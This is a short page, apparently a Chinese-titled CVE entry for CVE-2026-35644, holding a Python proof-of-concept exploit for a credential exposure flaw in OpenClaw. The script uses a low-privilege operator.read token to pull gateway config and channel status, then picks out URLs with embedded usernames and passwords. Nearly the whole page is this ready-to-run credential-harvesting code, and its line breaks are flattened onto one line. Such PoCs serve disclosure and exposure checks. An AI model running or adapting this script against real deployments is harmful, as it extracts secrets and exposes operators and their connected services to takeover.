CVE-2026-35644 OpenClaw凭据信息泄露漏洞

import requests import json # Exploit Title: OpenClaw Credential Exposure PoC # CVE: CVE-2026-35644 # Description: Retrieves gateway snapshots to extract credentials from URL fields. def check_cve(url, token): headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Target endpoints mentioned in the description endpoints = ["/api/config.get", "/api/channels.status"] for endpoint in endpoints: try: response = requests.get(f"{url}{endpoint}", headers=headers, timeout=10) if response.status_code == 200: data = response.json() print(f"[+] Data retrieved from {endpoint}:") print(json.dumps(data, indent=2)) # Basic logic to highlight potential credential exposure if 'channels' in data: for channel in data['channels']: for field in ['baseUrl', 'httpUrl']: if field in channel and '://' in channel[field] and '@' in channel[field]: print(f"[!] Potential exposed credential in {field}: {channel[field]}") else: print(f"[-] Failed to retrieve {endpoint}: Status {response.status_code}") except Exception as e: print(f"[-] Error connecting to {endpoint}: {e}") if __name__ == "__main__": target_url = "http://localhost:8080" # Token with operator.read scope auth_token = "OPERATOR_READ_TOKEN" check_cve(target_url, auth_token)